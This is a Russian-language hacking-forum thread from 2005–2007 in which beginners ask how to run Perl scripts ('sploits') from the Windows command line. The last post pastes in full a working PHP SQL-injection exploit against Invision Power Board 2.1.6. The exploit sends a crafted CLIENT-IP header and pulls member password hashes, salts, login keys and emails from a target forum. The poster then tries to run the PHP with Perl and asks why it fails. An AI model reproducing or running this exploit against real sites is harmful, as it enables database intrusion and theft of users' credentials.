Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Запуск Perl скрипта из командной строки |

17.11.2005, 21:25
|
|
Новичок
Регистрация: 05.11.2005
Сообщений: 17
Провел на форуме: 118331
Репутация:
0
|
|
Запуск Perl скрипта из командной строки
Помогите новечку. Почему у меня не запускается интерпритатор perl... Ну мне допустим надо запустить скрипт написанный на perl из командной строки я пишу например:
C:\>perl test.pl
Но мне сообщение
' perl ' is not recognized as an internal or external command, operable program or batch file
Хотелось бы узнать с чем ето связано?... и что сделать надо? чтоб всё работало....
|
|
|

17.11.2005, 21:30
|
|
Познающий
Регистрация: 08.04.2005
Сообщений: 69
Провел на форуме: 207537
Репутация:
59
|
|
у тебя должен для начала быть установлен етот самый пёрл...
под винду к примеру юзают ActivePerl .... (ссылки даст любой поисковик)
|
|
|

17.11.2005, 21:44
|
|
Новичок
Регистрация: 05.11.2005
Сообщений: 17
Провел на форуме: 118331
Репутация:
0
|
|
О пасиб чувак большое.... теперь всё работает.
|
|
|

25.12.2005, 19:40
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме: 1204641
Репутация:
412
|
|
А у меня не запкскается никогда таким вот
макаром(пробовал однажды)
Приходится честно писать
C:\perl\bin\perl.exe C:\а_тут_сплойт\а_кроме_них_н _перле_нет_ниче.pl
|
|
|

25.12.2005, 19:49
|
|
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме: 6490435
Репутация:
2290
|
|
Мой компьютер => свойства => дополнительно => переменные среды => Path
|
|
|

25.12.2005, 20:36
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме: 5355463
Репутация:
2258
|
|
DRON а я ваще сразу sploit.pl запускаю и фсе=)
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|

26.12.2005, 14:48
|
|
Новичок
Регистрация: 25.11.2005
Сообщений: 21
Провел на форуме: 49193
Репутация:
3
|
|
Я поместил в папку Exploits у ся на тачке bat-файл такого содержания:
C:\WINDOWS\system32\cmd.exe
Делаем ярлык на bat файл на рабочий стол.
При открытии появляеца следущее:
E:\Exploits>C:\WINDOWS\system32\cmd.exe
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
E:\Exploits>
Вводим my_0day_sploit.pl и все
з.ы. тоже самое я проделал для nmap'a
|
|
|

19.07.2007, 21:31
|
|
Banned
Регистрация: 21.06.2007
Сообщений: 87
Провел на форуме: 543344
Репутация:
43
|
|
сори за нупский вопрос....а как сохранить определеный скрипт в .pl и запустить его??и важен ли в какой директории она находится?
|
|
|

20.07.2007, 08:50
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме: 9089375
Репутация:
4268
|
|
Открываешь блокнот, всовываешь туда код на перле, жмакаешь сохранить как, даешь имя sploit.pl жмешь OK. Устанавливаешь Active Perl, копируешь свой сплоит в папку bin этого пакета, запускаешь cmd, идешь в папку bin и даешь команду perl sploit.pl
__________________
...
|
|
|

20.07.2007, 11:55
|
|
Banned
Регистрация: 21.06.2007
Сообщений: 87
Провел на форуме: 543344
Репутация:
43
|
|
Сообщение от Alexsize
Открываешь блокнот, всовываешь туда код на перле, жмакаешь сохранить как, даешь имя sploit.pl жмешь OK. Устанавливаешь Active Perl, копируешь свой сплоит в папку bin этого пакета, запускаешь cmd, идешь в папку bin и даешь команду perl sploit.pl
спасибо большое.....я сохранил все полусилось но вот не запускается =(((я вот этот скрипт хочу
PHP код:
<?
## Invision Power Board <= 2.1.6 "CLIENT_IP" Remote SQL Injection Exploit
## Coded by Cytech (hellknights.void.ru), Vulnerability by 1dt.w0lf (rst.void.ru)
Error_Reporting(E_ALL & ~E_NOTICE);
function SendExploit($host,$port,$exploit,$mode)
{
$sock = fsockopen($host,$port,$errno,$errstr);
if (!$sock) echo "\ncant connect to remote server!";
else
{
fputs ($sock,$exploit);
while (!feof($sock))
{
$y0=fgets($sock,9999);
if($mode == "geterror")
{
echo(htmlspecialchars($y0));
}
$j = $j.$y0;
}
}
fclose ($sock);
if($mode == "sqlinject")
{
$killhdr=substr($j,strpos($j,"session_id="));
$killhdz=substr($killhdr,0,strpos($killhdr,'path') );
$res = str_replace("session_id=", "\nanswer=", $killhdz);
echo htmlspecialchars($res);
}
}
echo<<<EOF
<pre><center><h2>Invision Power Board 2.1.6 "CLIENT_IP" SQL-injection Exploit</h2>[ Coded by Cytech, Vulnerability by 1dt.w0lf ]</center>
<form action="" method="post">
HOST: <input name="host" size="20" value="hackme.ru"> * hostname
PORT: <input name="port" size="20" value="80"> * httpd`s port
PATH: <input name="path" size="21" value="/index.php"> * path to forum`s index.php
USERID: <input name="uname" size="21" value="1"> * username, which data you want to get
PREFIX: <input name="prefix" size="21" value="ibf_"> * you can get prefix from error (click "geterror")
ROW: <SELECT name="shellcode">
<OPTION value="ip_address">ip_address (members)</OPTION>
<OPTION value="member_login_key">member_login_key (members)</OPTION>
<OPTION value="id">id (members)</OPTION>
<OPTION value="name">name (members)</OPTION>
<OPTION value="email">email (members)</OPTION>
<OPTION value="legacy_password">GET legacy_password (members)</OPTION>
<OPTION value="converge_pass_hash">converge_pass_hash (members_converge)</OPTION>
<OPTION value="converge_pass_salt">converge_pass_salt (members_converge)</OPTION>
<OPTION value="converge_email">converge_email (members_converge)</OPTION>
</SELECT> * row which you want to get (table)
TABLE:<SELECT name="table">
<OPTION value="members">members</OPTION>
<OPTION value="members_converge">members_converge</OPTION>
</SELECT> * please, choose here table eq row which you selected before
<input name="exploit" value="exploit IPB" type="submit"> <input name="geterror" value="check vulnerability & get prefix" type="submit">
[+] shellcode example: ' UNION SELECT ip_address,0,0,0 FROM ibf_members WHERE id=1/*
</form>
EOF;
$host = $_POST['host'];
$path = $_POST['path'];
$port = $_POST['port'];
$shellcode = $_POST['shellcode'];
$dbprefix = $_POST['prefix'];
$table = $_POST['table'];
$uname = $_POST['uname'];
echo "\n------------------------------------------------------------------\n";
if(!is_null($_POST['exploit']))
{
if($_POST['table']=="members") $id = "id"; else $id = "converge_id";
$injectcode = "' UNION SELECT ".$shellcode.",0,0,0 FROM ".$dbprefix.$table." WHERE ".$id."='".$uname."'/*";
echo "[+] current used shellcode: $injectcode";
$exploit = "GET ".$path."?s=technoid_attacker HTTP/1.1\r\n".
"TE: deflate,gzip;q=0.3\r\n".
"Connection: TE, close\r\n".
"Host: ".$host."\r\n".
"User-Agent:\r\n".
"CLIENT-IP: ".$injectcode."\r\n\r\n";
SendExploit($host,$port,$exploit,"sqlinject");
}
if(!is_null($_POST['geterror']))
{
$injectcode = " 'technoid-attacker";
echo "[+] current used shellcode: $injectcode";
$exploit = "GET ".$path."?s=technoid_attacker HTTP/1.1\r\n".
"TE: deflate,gzip;q=0.3\r\n".
"Connection: TE, close\r\n".
"Host: ".$host."\r\n".
"User-Agent:\r\n".
"CLIENT-IP: ".$injectcode."\r\n\r\n";
SendExploit($host,$port,$exploit,"geterror");
}
echo "\n------------------------------------------------------------------\n";
echo "</pre>";
?>
а он говорит
Unterminated <> operator at C:\Perl\bin\sploit.pl line 1.
че делать??можешь аську дать пожалуйста?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|